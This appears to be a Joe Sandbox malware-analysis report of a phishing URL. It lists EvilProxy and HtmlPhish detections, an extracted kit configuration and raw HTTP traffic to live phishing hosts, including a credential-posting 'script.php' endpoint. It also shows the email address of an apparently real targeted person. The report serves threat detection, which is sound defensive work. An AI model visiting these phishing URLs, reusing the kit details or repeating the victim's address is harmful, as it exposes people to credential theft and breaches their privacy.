Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==

Overview

General Information

Sample URL:http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==
Analysis ID:1590467
Infos:

Detection

EvilProxy, HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Yara detected Evil Proxy Phishing kit
Yara detected HtmlPhish10
AI detected suspicious Javascript
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid 'forgot password' link found
Invalid T&C link found

Classification

  • System is w10x64
  • chrome.exe (PID: 560 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,12937315425424320999,1974519677916407761,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"pagemsg": "{\\\"LoginPage\\\":{\\\"text\\\":null,\\\"color\\\":\\\"black\\\"},\\\"PassPage\\\":{\\\"text\\\":null,\\\"color\\\":\\\"black\\\"}}", "semail": "", "urlx": "script.php", "lmode": "b"}
SourceRuleDescriptionAuthorStrings
dropped/chromecache_67JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    0.1.id.script.csvJoeSecurity_EvilProxyYara detected Evil Proxy Phishing kitJoe Security
      2.5..script.csvJoeSecurity_EvilProxyYara detected Evil Proxy Phishing kitJoe Security
        2.3.pages.csvJoeSecurity_EvilProxyYara detected Evil Proxy Phishing kitJoe Security
          2.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
            2.1.pages.csvJoeSecurity_EvilProxyYara detected Evil Proxy Phishing kitJoe Security
              Click to see the 3 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=Avira URL Cloud: Label: phishing
              Source: 0.1.id.script.csvMalware Configuration Extractor: Evil Proxy {"pagemsg": "{\\\"LoginPage\\\":{\\\"text\\\":null,\\\"color\\\":\\\"black\\\"},\\\"PassPage\\\":{\\\"text\\\":null,\\\"color\\\":\\\"black\\\"}}", "semail": "", "urlx": "script.php", "lmode": "b"}

              Phishing

              barindex
              Source: Yara matchFile source: 0.1.id.script.csv, type: HTML
              Source: Yara matchFile source: 2.5..script.csv, type: HTML
              Source: Yara matchFile source: 2.3.pages.csv, type: HTML
              Source: Yara matchFile source: 2.1.pages.csv, type: HTML
              Source: Yara matchFile source: 2.2.pages.csv, type: HTML
              Source: Yara matchFile source: 2.3.pages.csv, type: HTML
              Source: Yara matchFile source: 2.1.pages.csv, type: HTML
              Source: Yara matchFile source: 2.2.pages.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_67, type: DROPPED
              Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: http://bebizicon.com/Campususa/index.xml#?email=b2... This script demonstrates several high-risk behaviors, including redirecting the user to a suspicious domain ('mudedevidaparasempre.com.br') and decoding a base64-encoded email parameter, which could be used for malicious purposes such as phishing or data exfiltration. The combination of these behaviors, along with the lack of transparency or legitimate context, suggests a high-risk script.
              Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://mudedevidaparasempre.com.br/index5759912.h... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script uses the `eval` function to execute remote or dynamic code, which poses a significant security risk. It also sends user data (potentially including sensitive information like cookies or session identifiers) to external servers, which could lead to data exfiltration. Additionally, the script uses heavily obfuscated code and URLs, making it difficult to analyze and understand its true purpose. These factors, combined with the suspicious nature of the script's behavior, indicate a high risk of malicious intent.
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: Number of links: 0
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: <input type="password" .../> found but no <form action="...
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: Title: H2RM6727FBQC82YYMO0F does not match URL
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: Invalid link: Forgotten my password
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: Invalid link: Terms of use
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: Invalid link: Privacy & cookies
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: Invalid link: Terms of use
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: Invalid link: Privacy & cookies
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: Invalid link: Terms of use
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: Invalid link: Privacy & cookies
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: <input type="password" .../> found
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: No <meta name="author".. found
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: No <meta name="author".. found
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: No <meta name="author".. found
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: No <meta name="copyright".. found
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: No <meta name="copyright".. found
              Source: https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comHTTP Parser: No <meta name="copyright".. found
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.144
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.144
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.144
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.144
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /index5759912.htm?email=olivier.dozat@innocap.com HTTP/1.1Host: mudedevidaparasempre.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://bebizicon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/cxx/88VT2QMJSV8PY8WZL0KO3AQLQ HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mudedevidaparasempre.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/sm/75R38C5T8QZBJLSXTQJJ3E2CI HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mudedevidaparasempre.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/jx/BY9284WK32TP02VZXSQRC7V0Q HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mudedevidaparasempre.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/mxl/mlg.svg?YLV3I8GJ5WHA39OEO3BQ2J34Y HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mudedevidaparasempre.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/mxl/sig_op.svg HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mudedevidaparasempre.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/mxl/mlg.svg?YLV3I8GJ5WHA39OEO3BQ2J34Y HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/aty/PI4BI95Y8LSRIPKOE7G9UXGHL HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mudedevidaparasempre.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/ecpt/55X7Q2CQ1S3SJ4E3WAJ5LJG1E HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mudedevidaparasempre.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/mxl/sig_op.svg HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/jx/BY9284WK32TP02VZXSQRC7V0Q HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/bxg/5K2DF1C200SF89B6CKQHB2M8R HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mudedevidaparasempre.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/ecpt/55X7Q2CQ1S3SJ4E3WAJ5LJG1E HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://mudedevidaparasempre.com.brSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mudedevidaparasempre.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/ic/3T4T2XYROSS7AR2M47G6BM7KZ HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mudedevidaparasempre.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/aty/PI4BI95Y8LSRIPKOE7G9UXGHL HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/ic/3T4T2XYROSS7AR2M47G6BM7KZ HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/script.php HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /m/script.php HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=85on4fjog8grd7jidvbu7erq4i
              Source: global trafficHTTP traffic detected: GET /m/script.php HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=85on4fjog8grd7jidvbu7erq4i
              Source: global trafficHTTP traffic detected: GET /m/script.php HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=85on4fjog8grd7jidvbu7erq4i
              Source: global trafficHTTP traffic detected: GET /m/script.php HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=85on4fjog8grd7jidvbu7erq4i
              Source: global trafficHTTP traffic detected: GET /m/script.php HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=85on4fjog8grd7jidvbu7erq4i
              Source: global trafficHTTP traffic detected: GET /Campususa/index.xml HTTP/1.1Host: bebizicon.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /Campususa/index.xslt HTTP/1.1Host: bebizicon.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Referer: http://bebizicon.com/Campususa/index.xmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bebizicon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://bebizicon.com/Campususa/index.xmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: bebizicon.com
              Source: global trafficDNS traffic detected: DNS query: mudedevidaparasempre.com.br
              Source: global trafficDNS traffic detected: DNS query: e2dpryeqzl.jappeckino.shop
              Source: global trafficDNS traffic detected: DNS query: api.ipify.org
              Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
              Source: unknownHTTP traffic detected: POST /m/script.php HTTP/1.1Host: e2dpryeqzl.jappeckino.shopConnection: keep-aliveContent-Length: 549sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://mudedevidaparasempre.com.brSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mudedevidaparasempre.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 14 Jan 2025 03:32:58 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE 